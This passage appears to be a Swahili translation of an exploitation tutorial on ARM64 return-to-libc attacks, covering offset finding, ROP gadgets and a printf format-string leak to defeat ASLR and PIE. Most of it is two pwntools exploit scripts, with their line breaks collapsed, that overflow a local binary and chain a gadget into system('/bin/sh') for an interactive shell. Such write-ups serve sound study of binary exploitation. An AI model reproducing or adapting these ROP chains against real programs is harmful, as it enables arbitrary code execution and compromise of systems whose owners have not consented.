Kwa kutumia pattern create 200, kuichanganua, na kuangalia kwa kigezo cha pattern search $x30 tunaweza kuona kwamba kigezo ni 108 (0x6c).
Tukitazama kazi kuu iliyovunjwa tunaweza kuona kwamba tungependa kupiga maagizo ya kwenda moja kwa moja kwa printf, ambayo kigezo chake kutoka kwenye mzigo wa binary ni 0x860:
Pata mfumo na string ya /bin/sh
Kwa kuwa ASLR imelemazwa, anwani zitakuwa zile zile daima:
Pata Vifaa
Tunahitaji kuwa na x0 anwani ya string ya /bin/sh na kuita system.
Kwa kutumia rooper kifaa cha kuvutia kilipatikana:
Kifaa hiki kitapakia x0 kutoka $sp + 0x18 na kisha kupakia anwani za x29 na x30 kutoka sp na kuruka kwenda x30. Kwa hivyo, kwa kifaa hiki tunaweza kudhibiti hoja ya kwanza na kisha kuruka kwa mfumo.
from pwn import*from time import sleepp =process('./rop')# For local binarylibc =ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")libc.address =0x0000fffff7df0000binsh =next(libc.search(b"/bin/sh"))#Verify with find /bin/shsystem = libc.sym["system"]defexpl_bof(payload):p.recv()p.sendline(payload)# Ret2mainstack_offset =108ldr_x0_ret =p64(libc.address +0x6bdf0)# ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;x29 =b"AAAAAAAA"x30 =p64(system)fill =b"A"* (0x18-0x10)x0 =p64(binsh)payload =b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0p.sendline(payload)p.interactive()p.close()
Ret2lib - Kupita NX, ASLR & PIE kwa kutumia kuvuja kwa printf kutoka kwenye steki
Gadgeti hii itapakia x0 kutoka $sp + 0x78 na kisha itapakia anwani za x29 na x30 kutoka sp na kuruka kwenda x30. Kwa hivyo na gadgeti hii tunaweza kudhibiti hoja ya kwanza na kisha kuruka kwa mfumo.
from pwn import*from time import sleepp =process('./rop')# For local binarylibc =ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")defleak_printf(payload,is_main_addr=False):p.sendlineafter(b">\n" ,payload)response = p.recvline().strip()[2:] #Remove new line and "0x" prefixif is_main_addr:response = response[:-4]+b"0000"returnint(response, 16)defexpl_bof(payload):p.recv()p.sendline(payload)# Get main addressmain_address =leak_printf(b"%21$p", True)print(f"Bin address: {hex(main_address)}")# Ret2mainstack_offset =108main_call_printf_offset =0x860#Offset inside main to call printfleakprint("Going back to "+str(hex(main_address + main_call_printf_offset)))ret2main =b"A"*stack_offset +p64(main_address + main_call_printf_offset)expl_bof(ret2main)# libclibc_base_address =leak_printf(b"%25$p")-0x26dc4libc.address = libc_base_addressprint(f"Libc address: {hex(libc_base_address)}")binsh =next(libc.search(b"/bin/sh"))system = libc.sym["system"]# ret2systemldr_x0_ret =p64(libc.address +0x49c40)# ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;x29 =b"AAAAAAAA"x30 =p64(system)fill =b"A"* (0x78-0x10)x0 =p64(binsh)payload =b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0p.sendline(payload)p.interactive()